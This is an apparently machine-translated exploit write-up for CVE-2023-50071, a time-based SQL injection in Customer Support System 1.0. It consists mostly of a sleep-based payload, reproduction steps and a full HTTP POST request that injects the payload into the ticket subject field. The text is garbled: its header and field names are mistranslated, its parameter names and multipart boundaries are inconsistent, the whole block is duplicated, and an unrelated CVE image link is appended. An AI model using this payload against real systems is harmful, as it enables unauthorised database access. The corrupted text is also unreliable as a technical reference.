#利用标题:客户支持系统1.0-多个SQL注入
漏洞
#日期: 15/12/2023
#利用作者: Geraldo Alcantara
#供应商HomePage:
#软件link:
#版本: 1.0
#在: Windows上测试
#CVE : CVE-2023-50071
描述:多个SQL注入漏洞
/customer_support/ajax.php?action=save_ticket在客户支持中
系统1.0允许身份验证的攻击者执行任意SQL
通过dections_id,customer_id和主题。有效载荷:
'+(select*from(select(sleep(20)))a)+'
复制的步骤:
1-登录到应用程序。
2-导航到page /customer_support/index.php?page=new_ticket。
3-创建新票,然后将恶意有效载荷插入其中之一
以下参数: dectment_id,customer_id或主题。
request:
post/customer_support/ajax.php?action=save_ticket http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:120.0)
壁虎/20100101 Firefox/120.0
ACCEPT: /
Accept-Language: pt-Br,pt; q=0.8,en-us; q=0.5,en; q=0.3
Accept-incoding: Gzip,Deflate,br
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;
边界=----------------------------------- 81419250823333111111993422505835
内容长度: 853
Origin: http://192.168.68.148
连接:关闭
Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket
cookie: csrftoken=1HWW6JE5VLFHJV2Y8LWGL3WNPBPJ3J2WAX9F2U0F25H5H5T6DSZTKJWD4NWFRBF8KO;
sessionId=xrn1sshbol1vipddxsijmgkdp2q4qdgq;
phpsessID=MFD30TU0H0S43S7KDJB74FCU0L
-------------------------------------- 81419250823333111111193422505835
content-disposition: form-data;名称='id'
-------------------------------------- 81419250823333111111193422505835
content-disposition: form-data;名称='主题'
teste'+(select*from(select(sleep(5)))a)+'
-------------------------------------- 81419250823333111111193422505835
content-disposition: form-data;名称='customer_id'
3
-------------------------------------- 81419250823333111111193422505835
content-disposition: form-data; name='dectment_id'
4
-------------------------------------- 81419250823333111111193422505835
content-disposition: form-data;名称='描述'
pblahsbr/p
-------------------------------------- 81419250823333111111193422505835
content-disposition: form-data; name='文件';文件名=''
content-type:应用程序/钟表流
--------------------------------------------------------- 814192508233331111993422505835-
漏洞
#日期: 15/12/2023
#利用作者: Geraldo Alcantara
#供应商HomePage:
#软件link:
#版本: 1.0
#在: Windows上测试
#CVE : CVE-2023-50071
描述:多个SQL注入漏洞
/customer_support/ajax.php?action=save_ticket在客户支持中
系统1.0允许身份验证的攻击者执行任意SQL
通过dections_id,customer_id和主题。有效载荷:
'+(select*from(select(sleep(20)))a)+'
复制的步骤:
1-登录到应用程序。
2-导航到page /customer_support/index.php?page=new_ticket。
3-创建新票,然后将恶意有效载荷插入其中之一
以下参数: dectment_id,customer_id或主题。
request:
post/customer_support/ajax.php?action=save_ticket http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:120.0)
壁虎/20100101 Firefox/120.0
ACCEPT: /
Accept-Language: pt-Br,pt; q=0.8,en-us; q=0.5,en; q=0.3
Accept-incoding: Gzip,Deflate,br
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;
边界=----------------------------------- 81419250823333111111993422505835
内容长度: 853
Origin: http://192.168.68.148
连接:关闭
Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket
cookie: csrftoken=1HWW6JE5VLFHJV2Y8LWGL3WNPBPJ3J2WAX9F2U0F25H5H5T6DSZTKJWD4NWFRBF8KO;
sessionId=xrn1sshbol1vipddxsijmgkdp2q4qdgq;
phpsessID=MFD30TU0H0S43S7KDJB74FCU0L
-------------------------------------- 81419250823333111111193422505835
content-disposition: form-data;名称='id'
-------------------------------------- 81419250823333111111193422505835
content-disposition: form-data;名称='主题'
teste'+(select*from(select(sleep(5)))a)+'
-------------------------------------- 81419250823333111111193422505835
content-disposition: form-data;名称='customer_id'
3
-------------------------------------- 81419250823333111111193422505835
content-disposition: form-data; name='dectment_id'
4
-------------------------------------- 81419250823333111111193422505835
content-disposition: form-data;名称='描述'
pblahsbr/p
-------------------------------------- 81419250823333111111193422505835
content-disposition: form-data; name='文件';文件名=''
content-type:应用程序/钟表流
--------------------------------------------------------- 814192508233331111993422505835-
![[CVE-2020-2883]-T3反序列化](https://hackhub.org/data/avatars/s/0/2.jpg){kind=small}
